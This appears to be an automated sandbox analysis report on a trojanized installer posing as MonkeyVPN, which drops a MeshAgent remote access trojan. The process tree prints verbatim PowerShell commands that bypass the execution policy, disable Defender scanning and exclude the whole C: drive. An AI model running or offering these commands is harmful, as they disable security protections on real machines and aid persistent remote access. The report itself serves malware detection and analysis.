Analysis

  • max time kernel
    123s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2024 19:27

General

  • Target

    MonkeyVPN1.1.2.exe

  • Size

    43.2MB

  • MD5

    f3696254e6992deccbff25ab0af2ebc8

  • SHA1

    54ca8798c4e4eb8a455769ab706cc3de7fa1917d

  • SHA256

    ce92f52a6bc1f39cb592766cbf17e5bed63fa59eda5c88a961517ba3da5b49d3

  • SHA512

    fc58762f3436e0c32d57ffdba6f3fc3eeb176a52eed93c41b3c867fd24e5eb431bb46a2e89c375598ae37c83ec726dc74b1a61ee18e5c583e339ad4a3de1e8e7

  • SSDEEP

    786432:W+ZLhn5jG92pLhIvTIUBEiigLdfKRo8lS1h2a35VdZn33DmzBt/vWJZlZj1SXgfK:WULhn5jGWVIbIUBUsxMlmV3nHnnD6TX5

Malware Config

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 64 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe
    "C:\Users\Admin\AppData\Local\Temp\MonkeyVPN1.1.2.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:492
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2368
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4956
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2392
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell "Add-MpPreference -ExclusionExtension '.exe' -Force"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            PID:400
          • C:\Users\Admin\AppData\Local\naver\naver.exe
            C:\Users\Admin\AppData\Local\naver\naver.exe -install
            5⤵
            • Sets service image path in registry
            • Executes dropped EXE
            PID:4420
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive " Function Disable-ExecutionPolicy {($ctx = $executionContext.GetType().GetField(\"_context\",\"NonPublic,Instance\").GetValue($executionContext)).GetType().GetField(\"_authorizationManager\",\"NonPublic,Instance\").SetValue($ctx, (New-Object System.Management.Automation.AuthorizationManager \"Microsoft.PowerShell\"))} Disable-ExecutionPolicy ; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableScriptScanning 1; Add-MpPreference -ExclusionPath 'C:\*' -Force; Add-MpPreference -ExclusionExtension '.exe' -Force; "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1408
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1604
      • C:\Users\Admin\AppData\Local\Temp\start.exe
        start.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i C:\Users\Admin\AppData\Local\Temp\MSI84BB.tmp
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1180
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4336,i,8293235976513689021,7261015831736501466,262144 --variations-seed-version --mojo-platform-channel-handle=3792 /prefetch:8
    1⤵
      PID:3904
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:652
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding A1A994092043BF518784C20154836C06 C
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:376
    • C:\Users\Admin\AppData\Local\naver\naver.exe
      "C:\Users\Admin\AppData\Local\naver\naver.exe" --meshServiceName="naver Service"
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious use of WriteProcessMemory
      PID:2768
      • C:\Windows\System32\wbem\wmic.exe
        wmic SystemEnclosure get ChassisTypes
        2⤵
          PID:2144
        • C:\Windows\system32\wbem\wmic.exe
          wmic os get oslanguage /FORMAT:LIST
          2⤵
            PID:4556
          • C:\Windows\System32\wbem\wmic.exe
            wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
            2⤵
              PID:4224
            • C:\Windows\system32\wbem\wmic.exe
              wmic os get oslanguage /FORMAT:LIST
              2⤵
                PID:3212
              • C:\Windows\System32\wbem\wmic.exe
                wmic SystemEnclosure get ChassisTypes
                2⤵
                  PID:5076
                • C:\Windows\System32\wbem\wmic.exe
                  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
                  2⤵
                    PID:1684
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell -noprofile -nologo -command -
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Modifies data under HKEY_USERS
                    PID:1148

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  2f57fde6b33e89a63cf0dfdd6e60a351

                  SHA1

                  445bf1b07223a04f8a159581a3d37d630273010f

                  SHA256

                  3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                  SHA512

                  42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                  Filesize

                  53KB

                  MD5

                  a26df49623eff12a70a93f649776dab7

                  SHA1

                  efb53bd0df3ac34bd119adf8788127ad57e53803

                  SHA256

                  4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

                  SHA512

                  e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  62477035d09eca55a37aa3ec60270868

                  SHA1

                  1ba72f9dd882e481b7b41dc21865459e9ee498a3

                  SHA256

                  070316ee9aeb1f07c2574cfc3adcd262a0bd9bee56561a759c15cd8112bc8d64

                  SHA512

                  c3922b9dc83102b1857488ce88fcc8a069892e2cf02663fa8f2f53546bcaadea30c72b5883b89e6266f01b8f8add45614ceeb21b874b1383dd3587798a6de449

                • C:\Users\Admin\AppData\Local\Temp\MSI84BB.tmp

                  Filesize

                  30.3MB

                  MD5

                  71141c5e6c5aa8e363f64c6014588d9b

                  SHA1

                  fd759473d536ce9423d3e9efb6f0b118f149e0d4

                  SHA256

                  26188d91a417a4c4c8c9226015ad6b5f4ddb86ca3bac9031206efc9e45acfc8e

                  SHA512

                  187314ecf0395d2245d37b0b3f2361896dcf6f6fa0d30b0c724c8a73a9d45c1798357654d863c8b304f775bfd32f0c30e0735a7abb5edbe0aeb4166046472b41

                • C:\Users\Admin\AppData\Local\Temp\MSIA207.tmp

                  Filesize

                  298KB

                  MD5

                  684f2d21637cb5835172edad55b6a8d9

                  SHA1

                  5eac3b8d0733aa11543248b769d7c30d2c53fcdb

                  SHA256

                  da1fe86141c446921021bb26b6fe2bd2d1bb51e3e614f46f8103ffad8042f2c0

                  SHA512

                  7b626c2839ac7df4dd764d52290da80f40f7c02cb70c8668a33ad166b0bcb0c1d4114d08a8754e0ae9c0210129ae7e885a90df714ca79bd946fbd8009848538c

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pslp4zjb.qfh.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Users\Admin\AppData\Local\Temp\start.exe

                  Filesize

                  30.4MB

                  MD5

                  5b073f98aab6e4f779aadd9f9d4b75a2

                  SHA1

                  c81700159450dc0ac7c40f7e73203a963fd83e9a

                  SHA256

                  0b04da17c658f67b1b74afb9831e09664dc976a401350a9b8e1f76c1e3c5caca

                  SHA512

                  84c4be46cbdbc40e5a90e2dce2a1c58ecf6816cc47cc9aa4105730deefb8c691ce406aa35b90152baffcf93564dec4ce747995ee0ba2573f6fa480f3e143780d

                • C:\Users\Admin\AppData\Local\naver\naver.exe

                  Filesize

                  5.3MB

                  MD5

                  2bf9eaf0d2693850c39817b4b797cf43

                  SHA1

                  e93f0ff794ab20bdda2f81d210f4869823455888

                  SHA256

                  325502bedbb2a25218b2004535a679a8fe08daf44ad87ebe98db7dc4f3278026

                  SHA512

                  2b7b6ca1bcffcb5a6007f938186dff14549bde8d8f5e61883525133a083d69812d28a1a41507a38d210283b4766b67442828259f45f7996f9e5beb4784f2166c

                • C:\Users\Admin\AppData\Local\naver\naver.msh

                  Filesize

                  22KB

                  MD5

                  2dd515ea546a81398d94dd15e3b4d55c

                  SHA1

                  eb0b0fca721a296906166b7e972559b87353b726

                  SHA256

                  becc832e6028a35aa50af95a2d80bcccbf0fcc8e9d1a333cd0661a77bdf089b2

                  SHA512

                  439b241e56783b766c70aaacfc2efe59b1136cc8e0e5377e606697d0b3048be6787a0a2ce2a549a294633dda8a39f02f2f457d999ce2ec22f74ef07daf912dfb

                • memory/492-1-0x0000000000560000-0x00000000036FF000-memory.dmp

                  Filesize

                  49.6MB

                • memory/492-48-0x0000000000560000-0x00000000036FF000-memory.dmp

                  Filesize

                  49.6MB

                • memory/492-38-0x0000000000560000-0x00000000036FF000-memory.dmp

                  Filesize

                  49.6MB

                • memory/1408-31-0x00007FF837800000-0x00007FF8382C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/1408-15-0x00007FF837800000-0x00007FF8382C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/1408-4-0x00000155F8340000-0x00000155F8362000-memory.dmp

                  Filesize

                  136KB

                • memory/1408-3-0x00007FF837803000-0x00007FF837805000-memory.dmp

                  Filesize

                  8KB

                • memory/1408-25-0x00007FF837800000-0x00007FF8382C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2368-32-0x000002697C650000-0x000002697C6C6000-memory.dmp

                  Filesize

                  472KB

                • memory/2368-28-0x000002697C600000-0x000002697C644000-memory.dmp

                  Filesize

                  272KB

                • memory/2368-50-0x00007FF837800000-0x00007FF8382C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2368-51-0x00007FF837800000-0x00007FF8382C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2368-27-0x00007FF837800000-0x00007FF8382C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2368-70-0x00007FF837800000-0x00007FF8382C1000-memory.dmp

                  Filesize

                  10.8MB

                • memory/2368-26-0x00007FF837800000-0x00007FF8382C1000-memory.dmp

                  Filesize

                  10.8MB